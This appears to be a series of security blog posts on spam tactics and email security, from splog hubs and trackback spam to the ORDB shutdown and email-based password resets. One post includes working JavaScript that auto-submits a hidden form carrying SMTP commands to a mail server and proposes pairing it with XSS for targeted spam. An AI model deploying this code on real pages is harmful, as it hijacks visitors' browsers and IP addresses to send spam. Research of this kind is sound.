The $100/month charge for the SEO Blackhat Forums is well worth it if you are either into getting ill gotten gains or into combating those gains. Every time I log in there I find out more interesting things that spammers and blackhat types are doing to make money. There’s a thread on there discussing splog hubs. For those of you who aren’t aware of what this is, let me enlighten you (picture ripped from said splogger):

On the right you have your unique content blogs, like mine or the dozens of other ones that you probably visit, with no malicious or spam content on them. In the middle is a spam hub. On that hub, the spammers pull all the content and aggregate it into a centralized hub. They use IP filtering so that the servers on the left can access it but no one else can. That way if for some reason the splogger visits his own spam hub, and sends a referrer (through an image by inadvertently clicking a link) the owner of the site cannot see their own content on the hub.

In this way they sploggers are scraping their own sites. This is so that when the owner of the site sees their content on the splogs on the right, even if they manage to take them down, they haven’t ruined the infrastructure that is used to scrape their content. Interesting. I have my own fun ways to combat this sort of things (along the lines of how I ruined the another splogger’s day. However, this is an interesting take (a splog by proxy) that I hadn’t heard of before in this way.

Every once in a while I hear something that really gets my imagination going. A few weeks ago when Samy and I were having lunch, he told me about a way to sent email through a browser using a form and an automatic form submission using JavaScript. While not new (there is an old obscure paper about this dating back to 2001), it’s definitely not well known. Especially in the day and age where JavaScript is coming under more scrutiny because of it’s malicious power, this could prove to be a really nasty thing in spammer’s arsenal.

The only obstacle in a spammer’s way is knowing which mail servers will and won’t accept malformed information in this way (thus far it looks like sendmail works, but I haven’t had luck with exchange or qmail). Here’s some sample code:

server='mail.server.com';
document.write('<form name="B" target="A" method="post" action="http://'+server+':25/" enctype="multipart/form-data">');
document.write('<textarea name="C"></textarea></form>');
s = 'HELO test\n';
s += 'EHLO test\n';
s += 'MAIL FROM:<test@hotmail.com>\n';
s += 'RCPT TO:<user@domain.com>\n';
s += 'DATA\n';
s += 'From: test@test.com\n';
s += 'To: test@test.com\n';
s += 'Subject: heh!\n';
s += 'testing 123\n\n';
s += '.\n\nQUIT\n\n';
document.B.C.value=s;
document.B.submit();

Combining XSS, and knowing the user who is visiting the page’s email address can actually create ultra targeted spam sent from that user. Why bother burning through your own IP space if you can get someone else to use theirs? Pretty ugly! Your mileage may vary in the calls themselves. I’d be interested to hear other people’s test results.

I got 290ish trackback spams last night, and that’s after quite a bit of anti-spam filters. For some reason spammers think I’ll approve their spam through excessive volume. Well, they couldn’t be more wrong. In fact, I’ve been thinking of interesting ways to detect them. For those of you who don’t run blogs, trackback spam is when robots pretend to be other blogs linking to my site. My site picks up the post requests from the robot, who tells it a few things, like the link to the site and a title and some sample text. Trackback spam is difficult to stop because it is doesn’t act like normal traffic (even when it’s working normally). So today I came up with a few semi-clever tactics to end the madness.

The first is the IP address. This is one thing the robot cannot fake. The robot normally must run from the webserver that the trackback is coming from. If it isn’t, that’s a huge signal that it’s a robot. So what if I connect to the same IP address on port 80 and look for a webserver? If I don’t see one, I can be 99% sure it’s fake traffic. The only way that wouldn’t be true is if the site just temporarily went down or the server is on another port. Either way, do I really care?

Next is the IP address of the link. The link itself should match the IP address. Why would a site be doing a trackback link for some other website? That makes no sense, and therefore again is 99% spam. The only way the spammers could get around this is to temporarily spoof the DNS entry to my server, but even still they’d have to be running a webserver on that IP address. In this way, you can quickly exhaust the number of sites they can spam from because they must run a webserver on it to get it to work (which they do in less than 1% of the cases I’ve looked at thus far). And even still they must also link to that same server. That greatly increases the work of a spammer to even get a link to show up in my moderation queue, and I can simply ban that IP address going forward, since I know it is truly the same IP as the spam site that I don’t care to see anyway.

It’ll be fun writing the software. They spammed the wrong guy 290 times!

This isn’t truly a new referral spam tactic, but it it’s probably not well known, especially amongst people who don’t run their own websites. I got an email from someone who thought that somehow some porn site had inadvertently linked to them and started to send them tons of traffic. In fact it was quite a few sites that they had thought were sending them traffic. He thought someone had mis-configured something and it was working to his advantage. As a result he put up a link back to their sites, thinking he could get more traffic. It turns out he was playing completely into their hands. He had been social engineered.

The URLs are pretty sneaky: http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=pr0nsitename (obviously the string itself has been changed). So I searched for pr0nsitename and found that dozens of hits were coming in from msn and live.com. Each one of them were cloaking and sending indexing themselves really high. When you actually went to that msn or live.com page you can see the URL linking back to me (something like this): www.pr0nsite.com/cgi-bin/blah.cgi?cmd=out&url=http://sla.ckers.org/forum/somepage.php Upon inspection you can see it’s a simple rediction to detect that I, in fact, started sending them traffic if I post a link pointing to them.

After some more digging I found that if you take any one of the IPs you can find that it comes from more than one different porn search. Hmm… what are the chances that a single IP address found it’s way to my site through two completely different redirects from porn sites? Uhm… I’ll give you a hint, it’s zero. The point is you cannot trust referring URLs. I barely look at them anymore, except to diagnose issues. You should not trust referring URLs from porn sites, you should definitely not click on them and you should absolutely definitely not post them on your site thinking you’ll get more traffic from it. It turns out that every single hit that both he and I got from this particular porn site was robotic. Yup, that’s bad.

This link probably won’t work in another week or so, but according to their website the open relay database is shutting down. This is an interesting turn of events. Their reasoning is that people who are running it have found other things to do and that the spammers have changed tactics. There may be some logic fallacy here, let’s think about this for a second.

First of all one of the reasons spammers changed tactics was because it was no longer as effective as it was before. That was due in large part to companies getting on blacklists because they had open relays that they didn’t even know about. So the problem was sort of fixing itself, leaving the spammers with fewer and fewer relays. That did, in fact, make the spammers change tactics. That doesn’t mean that the problem will stay fixed though. Let’s think about how companies use ORDB: when a mail is sent the server does a DNS lookup against relays.ordb.org with the IP prepended to it, if it comes back as a positive, it means the host is a relay and it shouldn’t send the email.

Now that the open relay database is gone, there are a few funky things that could happen. 1) You could see a delay in processing time with a lot of mail servers that rely on the ORDB domain being up to check their blacklist. Since the server is no longer up, and the DNS entries are going away the lookup will have to fail before it works. Postmasters, it’s time to upgrade. 2) You may start seeing a sharp rise in the amount of relays out in the world, allowing the spammers to move back to their old tactics. 3) The ORDB guys “recommend a combination involving greylisting and content-based analysis (such as the dspam project, bmf or Spam Assassin).” Until that happens you may also see an increase in spam while the postmasters upgrade their systems.

Yes, the ORDB was sort of outdated technology, but that doesn’t mean it wasn’t needed. However, only time will tell what the full impact will be.

I ran across this article today on 99 ways to secure your email. Largely it’s email etiquette and efficiency fluff and there are really only a small handful of actual ways to secure your email in it (numbers 78-99). There are a few tips that I’d tell people that are definitely not mentioned on their list. Here are a few from my personal list:

1) Turn off preview panes. When you click an email and it shows up in the preview you are rendering the remote images and the click-tracking that spammers use to verify the email lists executes. That alerts them to the fact that you a) are a real user and b) are a user who reads spam. Having your email automatically open also increases the likelihood of email client automatic exploitation. None of those are good, so turn off the preview pane.

2) Don’t put email addresses or sensitive corporate information into out of office emails. If you are out of office, just tell them the name of who to get in contact with. If they know anything about your company they’ll know how to get in touch with the front desk and use the person’s name to get in touch with them. A number of times people have set out of office messages with stuff like, “If you need information on super secret project x please contact….” Firstly, that’s bad if it’s someone who doesn’t really know you (sales people, etc…) secondly, if it contains email addresses those too can be scraped by the spammers who watch the return addresses for bounces.

3) Use domain keys, SPF (sender policy framework) records or other tools to reduce spoofing. If you want to allow people to know if you are legitimately sending email from all users on your domain without causing them too much grief, install domain keys or use SPF records to reduce the likelihood of people successfully spoofing your email. PGP signing is great but it only works for the one person using it, unlike domain keys.

4) Unlike what the article says do NOT use Yahoo or Hotmail as methods to send anonymous emails. Both send headers showing the recipient where you are originating from. Use something like hushmail instead.

5) Create custom email accounts for specific applications. I’ve seen a number of people who have begun building out vanity email addresses based on the specific site they are visiting, EG: ha.ckers.org@mysite.com

6) Validate users who are allowed to send email to you. This is an ugly one but by only allowing people who you have authorized to email you you can significantly reduce unsolicited email. You had better not use one of these accounts for anything you want to get electronic receipts for, but for personal accounts it’s a pretty decent solution.

7) Use a fake or modified name on each site you visit. If my name is “John Smith” I could use something like John Petsmart Smith will allow me to know that Petsmart has sold my email information when I get spam or phishing emails in the future.

Anyway, there are dozens of ways to secure your email. I’m sure everyone can contribute to this list. It’s a huge topic, that they really only scratched the surface of.

Over the last several years I’ve noticed a disturbing trend in web application security - the use of email as a form of authentication. Once upon a time web application security was a very obscure concept, and as such it made sense to rely on a simple (although largely inaccurate) assumption which is that users have complete control over their email address. Let’s think about this for a second. How are emails being used today?

According to MAAWG between 80-85% of all email is abusive. Okay, so the user is inundated with spam, viruses, trojans, phishing emails and other scams and that represents the vast majority of email they will receive. That means a pathetic 15-20% of email is actually “good” or non-abusive.

I don’t have any real data to back up how many email accounts worldwide have been compromised but I do have statistics on how many of the top two web mail servers have been compromised with some form of attack. Both Hotmail and Yahoo mail have had issues, but let’s not forget Gmail too. At one point I met with an AOL business person and they told me that the number of account takeovers they had were “in the percentage” range. He was unwilling to tell me how many percent, but even if it’s 1% of users that represents over 500,000 accounts.

Okay, so email is both insecure and highly targeted for malicious activities. Now let’s look at how companies are using it. Many companies still require that users use an email address as the primary username for their accounts for logging in. Companies reference the accounts as such. That makes it extremely easy to identify users, and potentially difficult to guess since there are billions of email addresses out there. However (and here’s the fatal flaw) the servers allow access to their websites by using email as a forgot password function.

So an attacker can get access to your email, (given the flaws in the webmail systems) they can look through the email, (since they have access to it) they can connect to the websites (which you have kept information on), they can use the forgot password function, (which generally asks for nothing more than an email address) and now they have access to your account.

Websites use email as a form of half-factor authentication. While it isn’t something you have, it is something you know that is not normally out of your control. In this way it is very easy to gain access to websites given access to an email account. People don’t generally think of their web mail as being a critical asset. That’s where they sign up for random websites since they don’t want to use their work account while shopping for lingerie. But by putting so much faith in the webmail application they now have risked whatever can be done on any website they they have an account with. A disturbing trend, to be sure.

I saw an interesting link today that reminded me a lot of the XSS Calculator. I wonder why. No, really I actually don’t wonder why - it’s practically the same thing. Spam-me-not is designed to allow people to use the mailto: functionality as they would today but obfuscating the URL using a mix of HTML and HEX characters. Cool in concept, but pretty trivial to beat. The cost to modern day robots is next to none to do the sort of backwards conversions required to get the real text.

I think the value in this is fairly limited. Spam is sort of a way of life these days. Email is really taking a back seat to other forms of internet communcation like instant messaging and oversees you’re beginning to see a lot of voice over IP traffic. It just makes more sense. Email has been around for 15 or 20 years now, and the spammers are always ahead of the anti-spammers. That’s not entirely true though. I’ve got a few account that get thousands of spam emails a day, and I see none of it. It’s pretty remarkable actually.

This form of obfuscation that spam-me-not provides is probably effective at the lowest common denominator of spam bots. And as more people use this form of obfuscation, developers will spend the 10 seconds necessary to write the code to decode it (they don’t even have to write it from scratch since it’s already out there). All of this reminds me of the DMCA problem. If you release software that has to be decoded at some point there is nothing you can do to stop that decoded information from being logged elsewhere. It’s the nature of software. Oh well, maybe some people will find some use for spam-me-not - while the rest use email forms.

It occured to me today as I looked over the referrer spam in my logs that it is particularly ineffective these days. For those of you who aren’t webmasters or don’t look at your logs very often, referrer spam is when spiders connect to your website and send a fake HTTP_REFERER (sic) header that incorrectly tells you that someone is linking to you. Most of the time it’s pretty ineffective, however, with Jeremiah’s CSS history hack, it might be far more useful.

It stands to reason if I’m an administrator of a website I’ve probably been to the homepage at some point in my last browser session. Of course I can turn that off the cross domain leakage with Safe History but no one uses that so the attack is pretty effective. If you know there is a single choke point (like a login page) that the administrator must use that’s even better, as they will have to use it to view their logs.

By verifying that the person looking at the logs is the person viewing the site in the logs the spammer can be sure that the webmaster views their logs and does something with them that may be effective in generating traffic. This is similar to how email spammers put tracking links on their email to watch open rates against particular emails (that’s why you should never auto-render images and you should never use the preview pane as that opens them automatically). Anyway, new attacks using this old hack are always interesting to me.

I was pretty amazed when I read this, but it is starting to make more and more sense the more I think about it, but “geek speak” is being used to defeat Baysean Spam filters. According to MessageLabs (who I happen to think is one of the best managed anti-spam services out there) using simple keywords can help reduce the likelyhood of something being caught as spam. And get this, one of the keywords mentioned is “XSS” of all things!

Like I said, it sorta makes sense when I started thinking about it. One of the most bizarre phenomenon was one time when I was writing a fairly indepth paper on the large scale effects of the 419 advanced fee fraud (if you don’t know what that is click here). While I was writing the fairly in depth technical explanation I sent it to a few trusted parties who I wanted to get input from. It never got there. It was impossible to get it to them because it kept getting marked as spam! I had to do all sorts of crazy things to disguise it in transit but still make it show up okay on the other end (basically I had to defeat the spam engine itself) but talk about a hassle!

Certain emails have certain characteristics. An email about cooking has the words “pots” and “spices”. An email about XSS has crazy filter evasion, and HTML markup galore. The heuristics of an email about XSS looks an awful lot like someone trying to evade filters and for the spam engine to not mark it as a false positive it has to tune itself looking for particular words that would whitelist an email that otherwise looked obfuscated or otherwise had a very high or alternately very low level of entropy.

Makes perfect sense! I guess the spam engines need some tuning now as XSS isn’t a marker of something particularly good or particularly bad as it turns out. I’ve seen the exact opposite thing happen where services have denied requests that have contained the word “XSS” in them. Talk about poor design - all you have to do is not use that word and you’re back up and running. XSS strikes again, in the most unlikely place!